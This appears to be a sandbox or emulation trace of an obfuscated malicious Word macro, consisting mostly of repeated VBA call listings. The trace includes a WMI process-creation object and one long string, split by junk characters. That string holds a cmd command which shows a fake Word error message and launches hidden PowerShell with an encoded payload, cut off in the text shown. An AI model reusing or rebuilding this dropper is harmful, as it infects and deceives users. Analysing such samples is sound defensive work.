                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    GznGGHyG

                                                    Close

                                                    bbsIZ

                                                    Mid

                                                    Name

                                                    Application

                                                    swNGWdd

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    rJEkbLH

                                                    Close

                                                    vEBqHrDnD

                                                    tWcKo

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    LzxxRHG

                                                    Close

                                                    EKezHIC

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    DpYbmDA

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    hDJDJ

                                                    Close

                                                    dXiwA

                                                    CreateObject

                                                    		CreateObject("winmgmts:win32_process")

                                                    hFSyAfFrF

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    hXxQDACJA

                                                    Close

                                                    xkQqDXCcD

                                                    Mid

                                                    Len

                                                    		Len("\x01 ]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3) -> 17689

                                                    lBenBDA

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    UavHTIBHo

                                                    Close

                                                    IcAHwPH

                                                    BNmrm

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

